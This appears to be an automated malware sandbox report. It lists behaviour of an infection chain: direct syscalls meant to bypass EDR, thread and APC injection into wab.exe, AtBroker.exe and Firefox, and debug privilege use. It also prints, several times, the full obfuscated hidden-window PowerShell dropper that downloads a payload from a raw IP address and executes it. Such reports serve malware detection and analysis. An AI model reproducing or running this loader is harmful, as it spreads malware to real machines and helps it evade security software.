Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov ecx, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337C51D mov eax, dword ptr fs:[00000030h] 12_2_2337C51D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB502 mov eax, dword ptr fs:[00000030h] 12_2_232EB502
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F2500 mov eax, dword ptr fs:[00000030h] 12_2_232F2500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332C50D mov eax, dword ptr fs:[00000030h] 12_2_2332C50D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332C50D mov eax, dword ptr fs:[00000030h] 12_2_2332C50D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330C560 mov eax, dword ptr fs:[00000030h] 12_2_2330C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB55F mov eax, dword ptr fs:[00000030h] 12_2_233CB55F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB55F mov eax, dword ptr fs:[00000030h] 12_2_233CB55F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F254C mov eax, dword ptr fs:[00000030h] 12_2_232F254C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BA553 mov eax, dword ptr fs:[00000030h] 12_2_233BA553
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23326540 mov eax, dword ptr fs:[00000030h] 12_2_23326540
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E547 mov eax, dword ptr fs:[00000030h] 12_2_2330E547
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233785AA mov eax, dword ptr fs:[00000030h] 12_2_233785AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F45B0 mov eax, dword ptr fs:[00000030h] 12_2_232F45B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F45B0 mov eax, dword ptr fs:[00000030h] 12_2_232F45B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23322594 mov eax, dword ptr fs:[00000030h] 12_2_23322594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A580 mov eax, dword ptr fs:[00000030h] 12_2_2332A580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A580 mov eax, dword ptr fs:[00000030h] 12_2_2332A580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF582 mov eax, dword ptr fs:[00000030h] 12_2_233AF582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E588 mov eax, dword ptr fs:[00000030h] 12_2_2336E588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E588 mov eax, dword ptr fs:[00000030h] 12_2_2336E588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337C5FC mov eax, dword ptr fs:[00000030h] 12_2_2337C5FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A5E7 mov ebx, dword ptr fs:[00000030h] 12_2_2332A5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A5E7 mov eax, dword ptr fs:[00000030h] 12_2_2332A5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233215EF mov eax, dword ptr fs:[00000030h] 12_2_233215EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233265D0 mov eax, dword ptr fs:[00000030h] 12_2_233265D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x6E6A609 Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtSetInformationProcess: Direct from: 0x77A32B7C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtOpenFile: Direct from: 0x77A32CEC Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtSetInformationThread: Direct from: 0x77A26319 Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQueryInformationToken: Direct from: 0x77A32BCC Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtAllocateVirtualMemory: Direct from: 0x77A33BBC Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtTerminateThread: Direct from: 0x77A32EEC Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x6E6431B Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FFB5E559E7F
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtNotifyChangeKey: Direct from: 0x77A33B4C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtMapViewOfSection: Direct from: 0x77A32C3C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtAllocateVirtualMemory: Direct from: 0x77A32B1C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtResumeThread: Direct from: 0x77A335CC Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQuerySystemInformation: Direct from: 0x77A32D1C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtClose: Direct from: 0x77A32A8C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtCreateKey: Direct from: 0x77A32B8C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtSetInformationThread: Direct from: 0x77A32A6C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQueryAttributesFile: Direct from: 0x77A32D8C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtDelayExecution: Direct from: 0x77A32CFC Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtOpenKeyEx: Direct from: 0x77A32ABC Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQueryInformationProcess: Direct from: 0x77A32B46 Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FFB92E02651 Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtProtectVirtualMemory: Direct from: 0x77A32EBC Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtCreateFile: Direct from: 0x77A32F0C Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x6E6414C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQuerySystemInformation: Direct from: 0x77A347EC Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtDeviceIoControlFile: Direct from: 0x77A32A0C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtOpenSection: Direct from: 0x77A32D2C Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtAllocateVirtualMemory: Direct from: 0x77A32B0C Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x6E64392 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread register set: target process: 7544 Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Thread register set: target process: 7912 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3080000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 307FF98 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe" Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. ') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u 